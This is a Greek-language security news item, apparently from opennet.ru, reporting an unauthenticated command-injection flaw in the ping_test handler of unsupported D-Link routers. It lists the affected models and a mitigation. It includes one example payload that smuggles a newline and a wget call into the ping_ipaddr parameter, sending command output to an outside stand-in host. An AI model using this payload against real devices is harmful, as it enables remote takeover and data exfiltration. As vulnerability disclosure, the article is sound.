Σε ασύρματους δρομολογητές D-Link επικίνδυνη ευπάθεια (), το οποίο σας επιτρέπει να εκτελείτε εξ αποστάσεως κώδικα στην πλευρά της συσκευής στέλνοντας ένα ειδικό αίτημα στον χειριστή "ping_test", προσβάσιμο χωρίς έλεγχο ταυτότητας.
Είναι ενδιαφέρον ότι, σύμφωνα με τους προγραμματιστές υλικολογισμικού, η κλήση "ping_test" θα πρέπει να εκτελείται μόνο μετά από έλεγχο ταυτότητας, αλλά στην πραγματικότητα καλείται σε κάθε περίπτωση, ανεξάρτητα από τη σύνδεση στη διεπαφή ιστού. Συγκεκριμένα, κατά την πρόσβαση στο σενάριο apply_sec.cgi και τη μετάδοση της παραμέτρου "action=ping_test", το σενάριο ανακατευθύνεται στη σελίδα ελέγχου ταυτότητας, αλλά ταυτόχρονα εκτελεί την ενέργεια που σχετίζεται με το ping_test. Για την εκτέλεση του κώδικα, χρησιμοποιήθηκε μια άλλη ευπάθεια στο ίδιο το ping_test, το οποίο καλεί το βοηθητικό πρόγραμμα ping χωρίς να ελέγχει σωστά την ορθότητα της διεύθυνσης IP που στάλθηκε για δοκιμή. Για παράδειγμα, για να καλέσετε το βοηθητικό πρόγραμμα wget και να μεταφέρετε τα αποτελέσματα της εντολής "echo 1234" σε έναν εξωτερικό κεντρικό υπολογιστή, απλώς καθορίστε την παράμετρο "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".
Η παρουσία της ευπάθειας έχει επιβεβαιωθεί επίσημα στα ακόλουθα μοντέλα:
- DIR-655 με υλικολογισμικό 3.02b05 ή παλαιότερο.
- DIR-866L με υλικολογισμικό 1.03b04 ή παλαιότερο.
- DIR-1565 με υλικολογισμικό 1.01 ή παλαιότερο.
- DIR-652 (δεν παρέχονται πληροφορίες σχετικά με προβληματικές εκδόσεις υλικολογισμικού)
Η περίοδος υποστήριξης για αυτά τα μοντέλα έχει ήδη λήξει, επομένως η D-Link , που δεν θα κυκλοφορήσει ενημερώσεις για την εξάλειψη της ευπάθειας, δεν συνιστά τη χρήση τους και συμβουλεύει την αντικατάστασή τους με νέες συσκευές. Ως λύση ασφαλείας, μπορείτε να περιορίσετε την πρόσβαση στη διεπαφή ιστού μόνο σε αξιόπιστες διευθύνσεις IP.
Αργότερα ανακαλύφθηκε ότι η ευπάθεια ήταν επίσης μοντέλα DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 και DIR-825, σχέδια για την έκδοση ενημερώσεων για τα οποία δεν είναι ακόμη γνωστά.
Πηγή: opennet.ru